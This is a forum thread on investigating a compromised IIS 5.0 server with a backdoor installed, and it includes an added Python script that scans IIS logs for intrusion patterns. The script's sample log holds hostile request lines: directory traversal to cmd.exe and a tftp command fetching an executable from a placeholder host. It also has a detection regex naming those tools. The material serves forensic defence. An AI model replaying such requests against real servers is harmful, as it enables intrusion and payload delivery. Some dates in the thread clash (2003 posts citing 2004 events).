Assessing Compromised machine

Status
Not open for further replies.

sohtnax (IS-IT--Management), Apr 24, 2003

I have a client with a compromised FTP server running IIS 5.0. I found the hacker to have installed the W32/Wollf.B backdoor in the System32 directory. How can I determine how he was able to get in?

 
After the usual disconnecting from the network and so on, I personally would start by going through IIS logs. One way to inject is through running tftp from the web server, and downloading the backdoor from the attackers server. I would then check event logs. After that, I would review Windows Updates. I was backdoored through the LSASS vulnerability a while ago, for example. Make sure you keep a log of everything you do, for a) future reference and b) in case your superiors want to know. Good luck! :)

----------------------------
"Security is like an onion" - Unknown
 
The server was definitely patched because I have an SUS server, and I was able to confirm that. I went through all the logs and found that it was the SYSTEM account which was compromised.

Not clear on how they would have used TFTP to do so, especially since they had accessed the system folder?

 
If your logs tell you exactly, or approximately when the system account was compromised, you might want to look at suspicious events just before that compromise.
 
> Not clear on how they would have used TFTP to do so, especially since they had accessed the system folder?
There is an exploit in IIS 5 (but since you said you have the patches, this may not be the case) that allows something like this: -c 255.255.255.255 -f sploit.exe -e sploit.exe

I can't remember the exact switches but you get the idea. Also, unicode (ie %20 for spaces) is often used in this.

But since you have the latest patches, this may not be the case. I'd go through your logs next and event logs as nipester suggested.

----------------------------
"Security is like an onion" - Unknown
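The two suggestions above (grep the IIS logs for tftp/cmd.exe abuse and URL-encoded paths, and narrow the search to the period just before the SYSTEM account compromise) can be done in one pass over a W3C extended log. The script below is an added example written for this thread, not code posted by anyone in it; it parses a constructed IIS 5.0 log sample (RFC 5737 test addresses, a made-up `w.exe` payload name), repeatedly percent-decodes each request so double-encoded traversal like `%255c` is seen as `\`, and reports entries that match a small suspicious-pattern list, optionally restricted to a time window ending at the compromise time you read from the event logs.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample of an IIS 5.0 W3C extended log (not from the thread).
# The 203.0.113.7 entries model the cmd.exe / tftp pattern described above.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-04-20 00:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-04-20 02:58:10 198.51.100.23 GET /default.htm - 200
2003-04-20 03:11:47 203.0.113.7 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+c:\\ 200
2003-04-20 03:12:01 203.0.113.7 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+tftp+-i+192.0.2.10+GET+w.exe 502
2003-04-20 03:20:33 198.51.100.23 GET /images/logo.gif - 304
2003-04-20 05:40:00 203.0.113.7 GET /_vti_bin/owssvr.dll - 404
"""

# Patterns worth a second look in a web log: directory traversal, a shell
# reached through the web server, tftp used to pull a file onto the box.
SUSPICIOUS = re.compile(r"(?:\.\./|\.\.\\|cmd\.exe|tftp|system32)", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Version, #Date)
        if fields is None:
            raise ValueError("data line before #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line; skip rather than mis-map columns
        yield dict(zip(fields, values))


def fully_decode(s, rounds=3):
    """Percent-decode until stable, so %255c -> %5c -> backslash is caught."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            return decoded
        s = decoded
    return s


def find_suspicious(text, before=None, window=timedelta(hours=1)):
    """Return suspicious requests; if `before` is given, only those in the
    `window` ending at that time (e.g. the SYSTEM compromise time)."""
    hits = []
    for rec in parse_w3c(text):
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        if before is not None and not (before - window <= ts <= before):
            continue
        raw = rec["cs-uri-stem"] + " " + rec["cs-uri-query"].replace("+", " ")
        decoded = fully_decode(raw)
        if SUSPICIOUS.search(decoded):
            hits.append({"time": ts, "ip": rec["c-ip"],
                         "request": decoded, "status": rec["sc-status"]})
    return hits


def tftp_downloads(hits):
    """Subset of hits where tftp was invoked through the web server."""
    return [h for h in hits if "tftp" in h["request"].lower()]


if __name__ == "__main__":
    for h in find_suspicious(SAMPLE_LOG):
        print(h["time"], h["ip"], h["status"], h["request"])
```

Point `find_suspicious` at the real `ex*.log` files under the IIS log directory and pass the compromise timestamp from the Security event log as `before`; the `status` column is useful too, since a 502 or 500 on a `cmd.exe` request often means the command ran but produced no page.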
 
Could it be they got in before the patches were applied? Most patches prevent security access issues, not fix them. e.g. the Blaster / Nachi virus patch only prevented you getting infected; if you were already infected, you still had all the symptoms.

Stu..

Only the truly stupid believe they know everything.
Stu.. 2004
 